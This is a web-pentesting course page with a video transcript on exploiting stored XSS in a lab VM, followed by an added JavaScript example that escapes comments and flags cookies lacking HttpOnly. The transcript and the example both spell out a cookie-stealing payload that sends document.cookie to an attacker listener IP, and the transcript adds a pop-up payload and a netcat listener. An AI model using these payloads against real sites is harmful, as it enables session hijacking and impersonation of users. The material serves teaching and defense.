Time: 4 hours 20 minutes
Difficulty: Intermediate
CEU/CPE: 5

Video Description

This video covers exploiting cross-site scripting (XSS): how to exploit XSS manually via redirection and cookie theft, and how to exploit XSS with BeEF.

Video Transcription

00:04
Welcome to Cybrary. I'm Raymond Evans. I will be your subject matter expert for Cybrary's web app pen testing course. In this video, we will be discussing exploiting cross-site scripting. What will be covered: we're gonna talk about how to exploit cross-site scripting manually,
00:20
using redirection and cookie theft, and then how to exploit cross-site scripting with BeEF. So how do we exploit cross-site scripting manually? The same technique that's used to identify cross-site scripting could also be used to exploit it,
00:32
except some additional steps need to be taken. First, we decide what kind of attack we want to perform.
00:38
Do you want to redirect the user to a malicious site, or do you want to steal some data from them?
00:43
Next we're going to cover cross-site scripting redirection. First, we're gonna cover cross-site scripting redirection, but first you're gonna need an additional VM. You're gonna need the cross-site scripting VM from PentesterLab. So go to pentesterlab.com
00:59
/exercises/xss_and_mysql_file.
01:07
That is the VM that we will be using for this one. So how do we exploit cross-site scripting manually to attempt redirection? Well, below is a line of code that could be used to cause an unwanted pop-up on a vulnerable website. So here in this code, we see it's calling image source
01:26
example.com, onerror,
01:30
window.open,
01:32
google.com,
01:33
'xss'. So with that, that onerror, window.open,
01:40
that URL that you put in there
01:44
is gonna be the URL that it's trying to call,
01:47
and it's gonna have a height and width of 500
01:51
by 500. So let's go check that out. Okay, so here we are in our environment
01:56
and
01:57
we want to, ah, we want somebody who's viewing this blog to get redirected or at least have a pop-up come up. So what we're gonna do is
02:06
I'm gonna come in here and, uh, we're gonna
02:08
leave a comment.
02:13
Let's do a title, test, and we're gonna leave it by anon.
02:20
So here in the text field, we're gonna put our script in here and
02:24
see if it works.
02:28
Look at that: Iceweasel has prevented the site from opening a pop-up window.
02:32
See? And this is why it's good to have a pop-up blocker turned on. But for the purposes of this class, we're gonna allow the pop-ups right now so you can check it out.
02:43
And we're gonna refresh the page here because the
02:46
attack is already on the page, stored on there. Right now, we're gonna refresh
02:51
and look at that.
02:53
We
02:54
have a pop-up
02:57
now. If this was connected to the Internet, it would've connected to google.com.
03:01
However, it was not so
03:06
it did not connect. Now, the reason why this worked like it did was because it's trying to pull an image source from this website, but it gets an error trying to pull it from that website.
03:19
So then, on that error, it opens up a window
03:23
and tries to go to google.com.
03:25
Now
03:28
redirect somebody.
03:30
But
03:30
we showed you before that your cookie
03:35
won't always show up in that other box, which we showed in the last video, and
03:39
if you were to try to pull the cookie in the pop-up
03:46
in this environment, it would do the same exact thing. You're not gonna get
03:51
that document.cookie populating the pop-up. However, you can set up a listener to try to get that cookie sent right back to you. So
04:00
let's break this line down a bit here that we got. So we have script, new Image, .src.
04:05
And so it calls out
04:09
to
04:10
the listener's IP and port.
04:12
And when it calls out to it, it's gonna send the document.cookie to that port. So the script tag encloses it; it includes this content as a script: new Image, source.
04:25
It identifies a server to communicate with, saying, Hey, we're gonna pull a new image from this source, and then listener IP
04:33
and port, slash <filename>.php, plus document.cookie. This portion identifies the server the script will communicate with, and will send the cookies to it. So here's an example of how
04:46
this is being used. In our vulnerable field, we will have
04:51
script, new Image, .src, http://, the IP address of the attacker,
04:58
port,
04:59
whatever the port is that the attacker will be listening on,
05:01
slash <filename>.php. How do we get data back from this attack? Well,
05:06
in order to do that, we're gonna have to set up a listener, so we need a listener. So in your terminal type netcat -lvp 80.
05:15
-l tells netcat to listen, -v tells netcat to be verbose, so print out information received, and -p designates the port to use.
05:25
So let's go set that up real quick. Here we are in our environment.
05:30
So you're gonna type
05:32
netcat
05:33
-lvp
05:36
80.
05:40
Netcat's listening on port 80.
05:43
Next, we're gonna put our script
05:46
that we're gonna use
05:47
onto the vulnerable web page.
05:49
All right, so here we are on our vulnerable section of the page.
05:55
We have a script, new Image, .src,
05:58
and we have our IP address here and port 80,
06:02
and we have our netcat listener already set up. So let's submit the query and see what happens.
06:10
Well, we got our pop-up because it's stored from last time, so let's close out of there.
06:15
I see PentesterLab's still working here,
06:17
so let's come over here to our listener. Oh, look at that, we got some information back,
06:25
so PentesterLab is connected to us.
06:30
See, we get a GET request,
06:31
the host. We see the user agent, so we see what they're coming from.
06:39
Accept, Accept, Accept,
06:41
we're seeing lots of information here.
06:44
Let it continue working here and see if it sends us that nice cookie back.
06:56
Try refreshing the page here,
07:02
and check our listener.
07:06
And there we go. Now we refresh the page.
07:12
We got the cookie
07:15
from the active user.
07:17
So now this cookie here can be used to imitate the individual on the web page. So if that person was to be logged in at the time as the admin or as somebody else,
07:28
this cookie here can be used to imitate them, which is very dangerous. So
07:34
if there's something that had sensitive data on it, if there's a website that has sensitive data on it,
07:41
and it was vulnerable to cross-site scripting, an attack like this could be used to steal a cookie that could imitate an individual
07:47
to get access into the website.
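As an added example (not from the video or the PentesterLab exercise), here are the two defender-side controls that break the stored XSS walked through above: output-encoding the comment before it is rendered, so the video's image-onerror and new Image payloads become inert text, and checking Set-Cookie headers for the HttpOnly flag that keeps a session cookie out of document.cookie and therefore out of the listener's hands. The comment strings and Set-Cookie headers are constructed sample input; ATTACKER_IP and <filename>.php are placeholders.

```javascript
// Added example (not from the video): defender-side checks against the stored
// XSS the video demonstrates. Payloads are the ones the video describes, kept
// as constructed sample input; ATTACKER_IP and <filename>.php are placeholders.

// Stored comments as they would be submitted through the vulnerable comment form.
const CONSTRUCTED_COMMENTS = [
  "Great post!",
  "<img src=http://example.com onerror=window.open('http://google.com','xss','height=500,width=500')>",
  '<script>new Image().src="http://ATTACKER_IP:80/<filename>.php?"+document.cookie</script>',
];

// Contextual output encoding for HTML body text: the five characters that can
// break out of a text node or a quoted attribute are replaced with entities,
// so the browser shows the comment as literal text instead of parsing markup.
function escapeHtml(untrusted) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render a comment the safe way (escaped) or the way the vulnerable blog did (raw).
function renderComment(title, body, { escape = true } = {}) {
  const enc = escape ? escapeHtml : (s) => s;
  return `<div class="comment"><h3>${enc(title)}</h3><p>${enc(body)}</p></div>`;
}

// Parse Set-Cookie headers and report which cookie names a page script could
// read via document.cookie: those without the HttpOnly flag. A session cookie
// that appears in this list is exactly what the video's listener received.
function cookiesReadableByScript(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(";").map((part) => part.trim()))
    .filter((parts) => !parts.slice(1).some((p) => p.toLowerCase() === "httponly"))
    .map((parts) => parts[0].split("=")[0]);
}

// Constructed sample headers: a weak session cookie next to a hardened one.
const CONSTRUCTED_SET_COOKIE = [
  "PHPSESSID=constructed-weak-session; Path=/",
  "sid=constructed-hard-session; Path=/; HttpOnly; Secure; SameSite=Lax",
  "theme=dark; Path=/",
];

// Show the escaped rendering of each comment and the cookie exposure report.
for (const c of CONSTRUCTED_COMMENTS) console.log(renderComment("test", c));
console.log("readable by script:", cookiesReadableByScript(CONSTRUCTED_SET_COOKIE));
```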

Up Next

Web Application Penetration Testing

In this web application penetration testing course, SME, Raymond Evans, takes you on a wild and fascinating journey into the cyber security discipline of web application pentesting. This is a very hands-on course that will require you to set up your own pentesting environment.

Instructed By

Raymond Evans
Instructor